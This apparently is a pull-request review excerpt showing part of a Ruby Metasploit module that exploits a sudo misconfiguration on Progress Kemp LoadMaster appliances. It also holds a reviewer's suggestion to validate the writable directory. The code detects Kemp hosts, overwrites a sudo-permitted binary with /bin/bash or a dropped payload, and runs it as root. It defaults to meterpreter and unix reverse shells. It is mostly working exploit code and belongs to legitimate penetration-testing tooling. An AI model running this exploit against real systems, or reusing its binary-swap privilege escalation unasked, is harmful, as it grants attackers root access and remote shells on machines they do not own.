modules/exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.rb

```diff
@@ -0,0 +1,161 @@
+            {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Command',
+            {
+              'Arch' => [ARCH_CMD],
+              'Type' => :command,
+              'Payload' =>
+                {
+                  'BadChars' => "\x27",
+                  'Compat' =>
+                    {
+                      'PayloadType' => 'cmd',
+                      'RequiredCmd' => 'generic gawk telnet ssh echo'
+                    }
+                },
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse'
+              }
+            }
+          ]
+        ],
+        'Privileged' => true
+      )
+    )
+    register_options([
+      OptString.new('TARGET_BINARY', [true, 'The path for a binary file that has permission to auto-elevate.', '/bin/loadkeys']),
+      OptString.new('WRITABLE_DIR', [ true, 'A directory where we can write files', '/tmp' ])
+    ])
+  end
+
+  def check
+    score = 0
+    score += 1 if read_file('/usr/wui/index.js').include?('KEMP')
+    score += 1 if read_file('/etc/motd').include?('Kemp LoadMaster')
+    score += 1 if exists?('/usr/wui/eula.kemp.html')
+    vprint_status("Found #{score} indicators this is a KEMP product")
+    return CheckCode::Detected if score > 0
+
+    return CheckCode::Safe
+  end
+
+  def verify_copy(src, dest, elevate)
+    orig_file_hash = file_remote_digestmd5(src)
+    vprint_status("Moving #{src} to #{dest}")
+    if elevate
+      output = cmd_exec("sudo /bin/cp '#{src}' '#{dest}'")
+    else
+      output = cmd_exec("/bin/cp '#{src}' '#{dest}'")
+    end
+    return true if file_remote_digestmd5(dest) == orig_file_hash
+
+    print_bad("Copy failed - #{output}")
+    false
+  end
+
+  def execute_dropper(target_binary, binary_rename, temp_payload_path)
+    vprint_status('Execute dropper')
+    write_file(temp_payload_path, generate_payload_exe)
+    chmod(temp_payload_path)
+    register_file_for_cleanup(temp_payload_path)
+    return unless verify_copy(target_binary, binary_rename, false)
+    return unless verify_copy(temp_payload_path, target_binary, true)
+
+    vprint_status("Running #{target_binary}")
+    cmd_exec("sudo '#{target_binary}'")
+  end
+
+  def execute_command(target_binary, binary_rename, cmd)
+    vprint_status('Execute command')
+    # save copy of target_binary
+    return unless verify_copy(target_binary, binary_rename, false)
+    return unless verify_copy('/bin/bash', target_binary, true)
+
+    vprint_status('Running payload command')
+    vprint_status(cmd_exec("sudo #{target_binary} -c '#{cmd}'"))
+  end
+
+  def exploit
+    writable_dir = datastore['WRITABLE_DIR']
+    if writable_dir.blank? || (writable_dir[-1] != '/')
+      writable_dir += '/'
+    end
+    target_binary = datastore['TARGET_BINARY']
```

Comment:
Can you make sure that `WRITABLE_DIR` is a directory on the target?
```suggestion
    end
    fail_with(Failure::BadConfig, "Invalid WRITABLE_DIR: #{writable_dir}") unless directory?(writable_dir)
    
    target_binary = datastore['TARGET_BINARY']
```